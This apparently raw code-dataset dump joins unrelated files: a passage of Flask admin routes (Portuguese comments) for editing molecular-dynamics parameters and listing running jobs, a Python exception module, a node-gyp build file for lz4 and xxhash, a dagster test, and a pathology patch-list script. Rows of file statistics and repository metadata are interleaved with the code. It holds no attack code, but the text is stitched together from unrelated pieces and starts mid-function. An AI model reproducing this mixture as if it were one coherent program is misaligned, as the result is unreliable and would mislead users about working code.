return redirect(url_for('admin'))
file = archive.readlines()
#le o valor atual do nsteps
for text in file:
if text.find('nsteps') > -1:
i = text.find('= ')
i+=2
text = text[i:].split(';')
nsteps = text[0]
nsteps = int(nsteps)
#le o valor atual do emstep
for text in file:
if text.find('dt') > -1:
i = text.find('= ')
i+=2
text = text[i:].split(';')
dt = text[0]
dt = float(dt)
archive.close()
return render_template('edit_md.html', nsteps = nsteps, dt = dt)
##############################
##### admin edit-md en ######
@app.route('/admin/edit-md_en', methods = ['GET', 'POST'])
@admin_required
def edit_md_en():
os.chdir(Config.MDP_LOCATION_FOLDER)
#modifica o valor do nsteps no arquivo ions.mdp
if request.method == 'POST':
new_nsteps = request.form.get('editnstep')
new_dt = request.form.get('editDt')
archive = open("md_pr.mdp","r")
file = archive.readlines()
#altera o valor do nsteps
for i, text in enumerate(file):
if text.find('nsteps') > -1:
archive = open("md_pr.mdp","w")
# altera a linha inteira do nsteps
file[i] = "nsteps = "+ new_nsteps +" ; 2 * 50000 = 1000 ps (1 ns) \n"
archive.writelines(file)
#altera o valor do emstep
for i, text in enumerate(file):
if text.find('dt') > -1:
archive = open("md_pr.mdp","w")
# altera a linha inteira do nsteps
file[i] = "dt = "+ new_dt +" ; 2 fs \n"
archive.writelines(file)
flash('update performed successfully.', 'primary')
return redirect(url_for('admin_en'))
#busca o valor do nsteps no arquivo ions.mdp para exibir para o usuario
# i é o indice (posição)
try:
archive = open("md_pr.mdp","r")
except:
flash('There was an error locating file, please try again later.', 'danger')
return redirect(url_for('admin_en'))
file = archive.readlines()
#le o valor atual do nsteps
for text in file:
if text.find('nsteps') > -1:
i = text.find('= ')
i+=2
text = text[i:].split(';')
nsteps = text[0]
nsteps = int(nsteps)
#le o valor atual do emstep
for text in file:
if text.find('dt') > -1:
i = text.find('= ')
i+=2
text = text[i:].split(';')
dt = text[0]
dt = float(dt)
archive.close()
return render_template('edit_md_en.html', nsteps = nsteps, dt = dt)
###############################
##### admin current dynamics br ########
@app.route('/admin/current-dynamics', methods=['GET', 'POST'])
@admin_required
def current_dynamics():
#lista de dinâmicas em andamento.
list_dynamics = list()
try:
#lista as pastas dos usuários.
list_directory = os.listdir(Config.UPLOAD_FOLDER)
#ordena a lista de diretórios em ordem alfabética.
list_directory.sort()
for pasta in list_directory:
try:
directory = Config.UPLOAD_FOLDER + pasta
#lendo os usuários e verificando se eles estão com alguma dinâmica em andamento.
#verifica se a execução é de enzima livre.
if os.stat(directory + '/executing').st_size != 0:
archive = open(directory + '/executing', 'r')
#captura o nome do usuário.
username = archive.readline()
archive.close()
#captura o nome da dinâmica.
archive = open(directory + '/namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
#captura a data final da dinâmica.
archive = open(directory + '/executing','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em productionmd.
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução.
archive = open(directory + '/DirectoryLog', 'r')
directorylog = archive.readline()
archive.close()
#acessa o log de execução.
archive = open(directorylog,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log.
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
else:
#caso não esteja em productionmd, é enviado o nome da etapa que a dinâmica esta.
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
#verifica se a execução é de enzima + ligante.
elif os.stat(directory + '/executingLig').st_size != 0:
archive = open(directory + '/executingLig', 'r')
#captura o nome do usuário.
username = archive.readline()
archive.close()
#captura o nome da dinâmica.
archive = open(directory + '/namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
#captura a data final da dinâmica.
archive = open(directory + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em productionmd.
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução.
archive = open(directory + '/DirectoryLog', 'r')
directorylog = archive.readline()
archive.close()
#acessa o log de execução.
archive = open(directorylog,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log.
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
else:
#caso não esteja em productionmd, é enviado o nome da etapa que a dinâmica esta.
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
except:
#caso os arquivos estejam todos vazios, apenas renova a lista e vai para a proxima pasta.
list_directory += list()
return render_template('current_dynamics.html', currentDynamics=list_dynamics)
except:
flash('No momento nenhuma dinâmica está em execução.', 'danger')
return render_template('current_dynamics.html')
###########################################
##### admin current dynamics en #########
@app.route('/admin/current-dynamics_en', methods=['GET', 'POST'])
@admin_required
def current_dynamics_en():
#lista de dinâmicas em andamento.
list_dynamics = list()
try:
#lista as pastas dos usuários.
list_directory = os.listdir(Config.UPLOAD_FOLDER)
#ordena a lista de diretórios em ordem alfabética.
list_directory.sort()
for pasta in list_directory:
try:
directory = Config.UPLOAD_FOLDER + pasta
#lendo os usuários e verificando se eles estão com alguma dinâmica em andamento.
#verifica se a execução é de enzima livre.
if os.stat(directory + '/executing').st_size != 0:
archive = open(directory + '/executing', 'r')
#captura o nome do usuário.
username = archive.readline()
archive.close()
#captura o nome da dinâmica.
archive = open(directory + '/namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
#captura a data final da dinâmica.
archive = open(directory + '/executing','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em productionmd.
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução.
archive = open(directory + '/DirectoryLog', 'r')
directorylog = archive.readline()
archive.close()
#acessa o log de execução.
archive = open(directorylog,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log.
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
else:
#caso não esteja em productionmd, é enviado o nome da etapa que a dinâmica esta.
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
#verifica se a execução é de enzima + ligante.
elif os.stat(directory + '/executingLig').st_size != 0:
archive = open(directory + '/executingLig', 'r')
#captura o nome do usuário.
username = archive.readline()
archive.close()
#captura o nome da dinâmica.
archive = open(directory + '/namedynamic.txt','r')
name_dynamic = archive.readline()
archive.close()
#captura a data final da dinâmica.
archive = open(directory + '/executingLig','r')
lines = archive.readlines()
archive.close()
last_line = lines[len(lines)-1]
#verifica se a execução já está em productionmd.
if last_line == '#productionmd\n':
#acessa o diretorio do log de execução.
archive = open(directory + '/DirectoryLog', 'r')
directorylog = archive.readline()
archive.close()
#acessa o log de execução.
archive = open(directorylog,'r')
lines = archive.readlines()
archive.close()
#busca a ultima linha do log.
last_line = lines[len(lines)-1]
if last_line.find('step ') > -1:
#recebe a quantidade de step e a data de termino.
date_finish = last_line
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":date_finish}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
else:
#caso não esteja em productionmd, é enviado o nome da etapa que a dinâmica esta.
#criando objeto com informações da dinâmica para exibir no front-end.
currentDynamics = {"username": username, "name_dynamic": name_dynamic, "date_finish":last_line}
#adicionando objeto a lista de dinamicas.
list_dynamics.append(currentDynamics)
except:
#caso os arquivos estejam todos vazios, apenas renova a lista e vai para a proxima pasta.
list_directory += list()
return render_template('current_dynamics_en.html', currentDynamics=list_dynamics)
except:
flash('No dynamics are currently running.', 'danger')
return render_template('current_dynamics_en.html')
#########################################
| 46.379288
| 173
| 0.55822
| 7,255
| 70,311
| 5.311234
| 0.070159
| 0.026263
| 0.033426
| 0.029585
| 0.886643
| 0.852049
| 0.835388
| 0.81717
| 0.804998
| 0.801676
| 0
| 0.00419
| 0.314375
| 70,311
| 1,516
| 174
| 46.379288
| 0.795133
| 0.088734
| 0
| 0.792469
| 0
| 0.001751
| 0.159132
| 0.013335
| 0
| 0
| 0
| 0.00066
| 0
| 1
| 0.035902
| false
| 0.021891
| 0.019264
| 0.000876
| 0.147986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0be8c5a594400e0c6dfa6f29e116f294e2ed99a4
| 302
|
py
|
Python
|
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
server/fb_folder/fb_exception.py
|
dundarahmet/plc_firebase_server
|
0ebf1093468174c4079c8faa4651181e1298f5f6
|
[
"Apache-2.0"
] | null | null | null |
class SecurityKeyError(Exception):
def __init__(self, message):
super().__init__(message)
class ListenError(Exception):
def __init__(self, message):
super().__init__(message)
class ChildError(Exception):
def __init__(self, message):
super().__init__(message)
| 17.764706
| 34
| 0.678808
| 30
| 302
| 6.033333
| 0.333333
| 0.198895
| 0.265193
| 0.331492
| 0.767956
| 0.767956
| 0.767956
| 0.767956
| 0.530387
| 0
| 0
| 0
| 0.201987
| 302
| 16
| 35
| 18.875
| 0.751037
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
0408758e91d3409bf81e615ec36589c3e15d1e24
| 1,338
|
gyp
|
Python
|
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | 1
|
2022-01-25T04:16:21.000Z
|
2022-01-25T04:16:21.000Z
|
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | null | null | null |
binding.gyp
|
evanlucas/node-lz4
|
1bcb05f952275e3d78f75c51b4b1e30eca200553
|
[
"MIT"
] | null | null | null |
{
'targets': [
{
'target_name': 'xxhash',
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ],
'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
'CLANG_CXX_LIBRARY': 'libc++',
'MACOSX_DEPLOYMENT_TARGET': '10.7',
},
'msvs_settings': {
'VCCLCompilerTool': { 'ExceptionHandling': 1 },
},
'sources': [
'lib/binding/xxhash_binding.cc',
'deps/lz4/lib/xxhash.h',
'deps/lz4/lib/xxhash.c',
],
'include_dirs': [
'<!(node -p "require(\'node-addon-api\').include_dir")',
],
'cflags': [ '-O3' ],
},
{
'target_name': 'lz4',
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ],
'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
'CLANG_CXX_LIBRARY': 'libc++',
'MACOSX_DEPLOYMENT_TARGET': '10.7',
},
'msvs_settings': {
'VCCLCompilerTool': { 'ExceptionHandling': 1 },
},
'sources': [
'lib/binding/lz4_binding.cc',
'deps/lz4/lib/lz4.h',
'deps/lz4/lib/lz4.c',
'deps/lz4/lib/lz4hc.h',
'deps/lz4/lib/lz4hc.c',
],
'include_dirs': [
'<!(node -p "require(\'node-addon-api\').include_dir")',
],
'cflags': [ '-O3' ],
},
],
}
| 27.306122
| 64
| 0.494021
| 129
| 1,338
| 4.906977
| 0.333333
| 0.066351
| 0.094787
| 0.052133
| 0.815166
| 0.755134
| 0.755134
| 0.755134
| 0.755134
| 0.755134
| 0
| 0.023182
| 0.290732
| 1,338
| 48
| 65
| 27.875
| 0.643836
| 0
| 0
| 0.5625
| 0
| 0
| 0.53139
| 0.14574
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0aed59548f9a49cf5463bd560d2c1ecae74dde1
| 140
|
py
|
Python
|
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/assets_tests/test_asset_io_manager.py
|
silentsokolov/dagster
|
510bf07bf6906294d5a239d60079c88211002ebf
|
[
"Apache-2.0"
] | null | null | null |
from docs_snippets.concepts.assets.asset_io_manager import assets_with_io_manager
def test():
assert len(assets_with_io_manager) == 2
| 23.333333
| 81
| 0.814286
| 22
| 140
| 4.772727
| 0.681818
| 0.257143
| 0.228571
| 0.361905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.114286
| 140
| 5
| 82
| 28
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
f0d06f6ddd1b7cd8772cda7887dd6c65e59eae6f
| 15,518
|
py
|
Python
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | 3
|
2018-12-06T04:18:42.000Z
|
2022-03-09T00:58:57.000Z
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | 1
|
2019-06-24T06:46:36.000Z
|
2019-06-24T06:46:36.000Z
|
bin/gen_list.py
|
yux94/Pathology
|
5a145b5ee106d32b08dbce57f395f4d62e5ece06
|
[
"RSA-MD"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 17 20:52:34 2018
@author: SENSETIME\yuxian
"""
import os
import random
import numpy as np
from PIL import Image
def filter_50percent_pixel(mask):
if np.sum(mask==0.0)/float(mask.size) > 0.5: #tumor region 比例小
tumor = False
else: #tumor region 比例大
tumor = True
return tumor
'''1024 png'''
# data_path = '/mnt/lustre/yuxian/Code/NCRF-master/coords/normal_train.txt'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/mask_HZQ_png/'
#
# data_path = '/mnt/lustre/yuxian/Code/NCRF-master/coords/tumor_valid.txt'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_VALID/mask_HZQ_png/'
#
# data_path = '/mnt/lustre/yuxian/Code/NCRF-master/coords/tumor_train.txt'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_TRAIN/mask_HZQ_png/'
#
# data_path = '/mnt/lustre/yuxian/Code/NCRF-master/coords/normal_valid.txt'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_VALID/mask_HZQ_png/'
'''mask folder'''
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_VALID/mask_HZQ/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_TRAIN/mask_HZQ/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_VALID/mask_HZQ/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_TRAIN/mask_HZQ/'
'''patch folder'''
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_VALID/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_TRAIN/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_VALID/'
# save_path = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_TRAIN/'
if __name__ == '__main__':
#/lustre/yuxian/Data_t1/pytorch-CycleGAN-and-pix2pix-master/datasets/Pathology/Camelyon16/txt_png_mask
'''Shuffle lines in txt'''
# path = '/mnt/lustre/yuxian/Data_t1/pytorch-CycleGAN-and-pix2pix-master/datasets/Pathology/Camelyon16/txt_png_mask/'
# Train_tumor = 'Train_tumor.txt'
# Train_normal = 'Train_normal.txt'
# Valid_tumor = 'Valid_tumor.txt'
# Valid_normal = 'Valid_normal.txt'
#
# Train_save = open("/mnt/lustre/yuxian/Data_t1/pytorch-CycleGAN-and-pix2pix-master/datasets/Pathology/train/A/Train_1v1_0_1024_A.txt",'w')
# Valid_save = open("/mnt/lustre/yuxian/Data_t1/pytorch-CycleGAN-and-pix2pix-master/datasets/Pathology/test/A/Val_1v1_0_1024_A.txt",'w')
# Train_lines=[]
# Valid_lines=[]
#
# with open(path+Train_tumor, 'r') as infile:
# for line in infile:
# Train_lines.append(line)
# infile.close()
#
# with open(path+Train_normal, 'r') as infile:
# for line in infile:
# Train_lines.append(line)
# infile.close()
#
# random.shuffle(Train_lines)
#
# print('length of txt:', len(Train_lines))
# for idx in range(len(Train_lines)):
# Train_save.write(Train_lines[idx])
# if idx%50==0:
# print(Train_lines[idx])
#
# Train_save.close()
#
#
# with open(path+Valid_tumor, 'r') as infile:
# for line in infile:
# Valid_lines.append(line)
# infile.close()
#
# with open(path+Valid_normal, 'r') as infile:
# for line in infile:
# Valid_lines.append(line)
# infile.close()
#
# random.shuffle(Valid_lines)
#
# print('length of txt:', len(Valid_lines))
# for idx in range(len(Valid_lines)):
# Valid_save.write(Valid_lines[idx])
# if idx%50==0:
# print(Valid_lines[idx])
#
# Valid_save.close()
'''+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'''
# 像素级别,先判断patch中tumor region的比例,划分为两类
mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_TRAIN/mask_HZQ_png/'
patch_folder = '/mnt//lustrenew/yuxian/Code/NCRF-master/Data/resample/PATCHES_TUMOR_TRAIN/'
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_VALID/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_VALID/'
mask_files = os.listdir(mask_folder)
tumor_list = []
normal_list = []
for file_ in mask_files:
if '.png' in file_:
mask = Image.open(os.path.join(mask_folder, file_))
if filter_50percent_pixel(np.asarray(mask)):#tumor region
tumor_list.append(os.path.join(mask_folder, file_))
else:
normal_list.append(os.path.join(mask_folder, file_))
mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/mask_HZQ_png/'
patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/'
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_VALID/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_VALID/'
mask_files = os.listdir(mask_folder)
for file_ in mask_files:
if '.png' in file_:
normal_list.append(os.path.join(mask_folder, file_))
#txt_png_mask
#txt_jpeg_mask
with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Train_tumor.txt","w") as f:
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Valid_tumor.txt","w") as f:
random.shuffle(tumor_list)
for _file in range(len(tumor_list)):
filename = tumor_list[_file].split('/')[-1][:-4]
list_ = tumor_list[_file].split('/')[:-2]
fuhao = '/'
patchpath = fuhao.join(list_)
# print(maskpath)
f.write(patchpath+'/'+filename+'.jpeg,'+tumor_list[_file]+'\n')
print(patchpath+'/'+filename+'.jpeg,'+tumor_list[_file])
with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Train_normal.txt","w") as f:
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/pixel/Valid_normal.txt","w") as f:
random.shuffle(normal_list)
for _file in range(len(normal_list)):
filename = normal_list[_file].split('/')[-1][:-4]
list_ = normal_list[_file].split('/')[:-2]
fuhao = '/'
patchpath = fuhao.join(list_)
# print(maskpath)
f.write(patchpath+'/'+filename+'.jpeg,'+normal_list[_file]+'\n')
print(patchpath+'/'+filename+'.jpeg,'+normal_list[_file])
f.close()
print('len(tumor_list)',len(tumor_list))
print('len(normal_list)',len(normal_list))
# 跟百度的一致,按类别取patch,再拼接
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_TRAIN/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_TRAIN/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/Train_tumor.txt","w") as f:
#
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1][:-5]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ_png/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'.png\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
#
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_TRAIN/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/Train_normal.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1][:-5]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ_png/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'.png\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
#
##
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_VALID/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_TUMOR_VALID/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/Valid_tumor.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1][:-5]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ_png/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'.png\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
#
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_VALID/mask_HZQ_png/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/1024/PATCHES_NORMAL_VALID/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_png_mask/Valid_normal.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1][:-5]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ_png/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'.png\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_TRAIN/mask_HZQ/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_TRAIN/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_jpeg_mask/Train_tumor.txt","w") as f:
#
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
#
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_TRAIN/mask_HZQ/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_TRAIN/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_jpeg_mask/Train_normal.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()
#
##
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_VALID/mask_HZQ/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_TUMOR_VALID/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_jpeg_mask/Valid_tumor.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ/'
# fuhao = '/'
# maskpath = fuhao.join(list_)
## print(maskpath)
#
# f.write(files_list[_file]+','+maskpath+filename+'\n')
# print(files_list[_file]+','+maskpath+filename)
#
# f.close()#
#
####################################################################################################
# mask_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_VALID/mask_HZQ/'
# patch_folder = '/mnt/lustre/yuxian/Code/NCRF-master/Data/PATCHES_NORMAL_VALID/'
# patch_files = os.listdir(patch_folder)
#
# files_list = []
# for file_ in patch_files:
# if '.jpeg' in file_:
# files_list.append(os.path.join(patch_folder, file_))
#
#
# with open("/mnt/lustre/yuxian/Code/NCRF-master/Data/txt_jpeg_mask/Valid_normal.txt","w") as f:
#
# random.shuffle(files_list)
# for _file in range(len(files_list)):
# filename = files_list[_file].split('/')[-1]
# list_ = files_list[_file].split('/')
# list_[-1] = 'mask_HZQ/'
